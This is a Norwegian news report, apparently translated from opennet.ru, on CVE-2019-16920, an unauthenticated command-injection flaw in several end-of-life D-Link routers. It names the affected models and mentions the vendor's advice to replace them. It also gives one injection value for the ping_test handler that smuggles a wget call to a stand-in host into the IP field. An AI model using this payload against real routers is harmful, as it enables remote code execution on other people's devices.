Eksternt utnyttbar sårbarhet i D-Link-rutere

I D-Link trådløse rutere identifisert farlig sårbarhet (CVE-2019-16920), som lar deg eksternt kjøre kode på enhetssiden ved å sende en spesiell forespørsel til "ping_test"-behandleren, tilgjengelig uten autentisering.

Interessant nok, ifølge fastvareutviklerne, skal "ping_test"-kallet bare utføres etter autentisering, men i virkeligheten kalles det i alle fall, uavhengig av å logge på nettgrensesnittet. Spesielt når du får tilgang til application_sec.cgi-skriptet og sender «action=ping_test»-parameteren, omdirigerer skriptet til autentiseringssiden, men utfører samtidig handlingen knyttet til ping_test. For å utføre koden ble en annen sårbarhet brukt i selve ping_test, som kaller opp ping-verktøyet uten å kontrollere riktigheten til IP-adressen som ble sendt til testing. For for eksempel å kalle opp wget-verktøyet og overføre resultatene av "echo 1234"-kommandoen til en ekstern vert, spesifiser bare parameteren "ping_ipaddr=127.0.0.1%0awget%20-P%20/tmp/%20http:// test.test/?$( echo 1234)".

Eksternt utnyttbar sårbarhet i D-Link-rutere

Tilstedeværelsen av sårbarheten er offisielt bekreftet i følgende modeller:

  • DIR-655 med fastvare 3.02b05 eller eldre;
  • DIR-866L med fastvare 1.03b04 eller eldre;
  • DIR-1565 med fastvare 1.01 eller eldre;
  • DIR-652 (ingen informasjon om problematiske fastvareversjoner er gitt)

Støtteperioden for disse modellene er allerede utløpt, så D-Link han uttalte, som ikke vil gi ut oppdateringer for dem for å eliminere sårbarheten, anbefaler ikke å bruke dem og anbefaler å erstatte dem med nye enheter. Som en sikkerhetsløsning kan du begrense tilgangen til nettgrensesnittet til kun pålitelige IP-adresser.

Det ble senere oppdaget at sårbarheten også var det påvirker modellene DIR-855L, DAP-1533, DIR-862L, DIR-615, DIR-835 og DIR-825, planer for utgivelse av oppdateringer som ennå ikke er kjent.

Kilde: opennet.ru

Legg til en kommentar